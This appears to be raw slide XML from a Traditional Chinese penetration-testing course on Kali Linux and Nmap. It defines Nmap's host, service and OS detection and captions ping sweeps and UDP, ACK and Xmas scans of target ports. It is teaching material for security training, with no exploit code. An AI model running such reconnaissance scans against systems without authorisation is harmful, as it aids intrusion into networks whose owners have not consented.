              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>這</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>行指令是從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>port 75</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>開始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>，一路</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>port 85</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>，看哪個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t> 有開就有回應。</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685799" y="900950"/>
            <a:ext cx="7372350" cy="2800350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3564868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57998" y="4292084"/>
            <a:ext cx="4608954" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>去</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>PING</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>目標網路，作用跟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>一樣</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952500" y="639272"/>
            <a:ext cx="7219950" cy="3124200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3966725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Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6000" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="6000" dirty="0"/>
              <a:t>工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1956705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1933575" y="4381500"/>
            <a:ext cx="3057504" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>scan ping port 80 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="901152" y="196619"/>
            <a:ext cx="7458075" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12618950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1933575" y="4381500"/>
            <a:ext cx="3076933" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>scan ping port 80 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="708833" y="905972"/>
            <a:ext cx="7410450" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2642088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2390775" y="5076825"/>
            <a:ext cx="3179332" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Xmas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>scan ping port 80 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="820448" y="896446"/>
            <a:ext cx="7419975" cy="2609850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="969232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a:t>滲透測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="6000" dirty="0" smtClean="0"/>
              <a:t>主題</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6000" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6000" dirty="0" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1467184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110882" y="1249270"/>
            <a:ext cx="8657016" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="257175" indent="-257175">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>NMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>是一個用於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>情資蒐集的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>網路掃描器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="257175" indent="-257175">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>最初由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Gordon Lyon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>用於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>目標偵測和服務</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的一項網路技術 。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="257175" indent="-257175">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>基本原理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>發送特製的封包至目標主機</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，然後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分析其反應</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="257175" indent="-257175">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>有許多功能，可用來</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>探測網路</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>目標偵測</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>服務</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>偵測</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>作業系統偵測</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="257175" indent="-257175">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>NMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>也提供更高階的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>腳本漏洞檢測</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Scripting Engine (NSE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文字方塊 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8269" y="136070"/>
            <a:ext cx="5683222" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0" err="1">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Namp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Ｎ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0" err="1">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>etwork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> Mapper</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8269" y="715754"/>
            <a:ext cx="9135731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>https://nmap.org/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>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7549" y="215033"/>
            <a:ext cx="1935797" cy="1037035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="圖片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2871235" y="3443238"/>
            <a:ext cx="1911157" cy="2484504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="內容版面配置區 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="6699" r="2316" b="5837"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4955344" y="3496152"/>
            <a:ext cx="3851642" cy="2378676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="圖片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="319607" y="3443238"/>
            <a:ext cx="2484504" cy="2484504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="795321" y="5436247"/>
            <a:ext cx="1830490" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Gordon Lyon</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="投影片編號版面配置區 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15450449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269229" y="2105844"/>
            <a:ext cx="5237610" cy="2512298"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="圖片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
